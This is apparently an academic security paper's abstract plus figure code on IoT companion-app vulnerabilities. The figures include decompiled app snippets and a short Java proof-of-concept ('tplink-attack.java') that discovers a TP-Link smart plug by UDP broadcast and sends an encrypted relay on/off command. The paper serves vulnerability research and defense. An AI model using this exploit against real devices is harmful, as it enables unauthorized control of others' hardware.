Beware of the App! On the Vulnerability Surface of Smart Devices through their Companion Apps

Internet of Things (IoT) devices are becoming increasingly important. These devices are often resource-limited, hindering rigorous enforcement of security policies. Assessing the vulnerability of IoT devices is an important problem, but analyzing their firmware is difficult for a variety of reasons, including requiring the purchase of devices. This paper finds that analyzing companion apps to these devices for clues to security vulnerabilities can be an effective strategy. Compared to device hardware and firmware, these apps are easy to download and analyze. A key finding of this study is that the communication between an IoT device and its app is often not properly encrypted and authenticated and these issues enable the construction of exploits to remotely control the devices. To confirm the vulnerabilities found, we created exploits against five popular IoT devices from Amazon by using a combination of static and dynamic analyses. We also did a larger study, finding that analyzing 96 popular IoT devices only required analyzing 32 companion apps. Among the conservative findings, 50% of the apps corresponding to 38% of the devices did not use proper encryption techniques to secure device to companion app communication. Finally, we discuss defense strategies that developers can adapt to address the lessons from our work.

==> figures/econtrol-broadcast.java <==
private Void a() { ...
  DatagramSocket d = this.e;
  d.send(new DatagramPacket(...,"255.255.255.255"));
  ...
}

==> figures/tplink-attack.java <==
private void discover(CompletableFuture turnOnTask) throws IOException {
  DatagramSocket socket = new DatagramSocket();
  new Thread(new DiscoverReceiver(socket, turnOnTask)).start();
  InetAddress group = InetAddress.getByName("255.255.255.255");
  byte[] message = TPLinkUtils.encryptWithHeader("{\"system\":{\"get_sysinfo\":{}}}");
  DatagramPacket packet = new DatagramPacket(message, message.length, group, 9999);
  socket.send(packet);
}

private void sendCommand(String turnOnOff) throws IOException {
  if(ipAddress != null){
    DatagramSocket socket = new DatagramSocket();
    Thread thread = new Thread(new ControllerReceiver(socket));
    thread.start();
    InetAddress addressGroup = ipAddress;
    String rawMsg = String.format("{\"system\":{\"set_relay_state\":{\"state\":%s}}}", turnOnOff);
    byte[] message = TPLinkUtils.encryptWithHeader(rawMsg);
    DatagramPacket packet = new DatagramPacket(message, message.length, addressGroup, 9999);
    socket.send(packet);
  }
}


==> figures/tplink-local.java <==
public void discoverLocal() {
  String requestId = DiscoveryUtils.a();
  try {
    DiscoveryContext discoveryContext = getDiscoveryContext();
    if (discoveryContext != null) {
        this.tpDeviceDiscovery.broadcastDiscovery(requestId, discoveryContext, getAgentConfig(), TPDiscoveryUtils.getLocalSendData(), UDP_PORT, UDP_ADDRESS, LOCAL_INTERVAL, true);
        discoveryContext.getDeviceCollector().a(getAgentConfig().getKey(), DiscoveryType.LOCAL);
        }
    } catch (Throwable e) {
        logger.a(requestId, e.getMessage(), e);
    }
}

==> figures/tplink-smartplug-commands.java <==
package com.tplinkra.smartplug.hsall.api;
public class System extends Module {
  public DownloadFirmware download_firmware;
  public Reset reset;
  public SetRelayState set_relay_state;
  ...
}

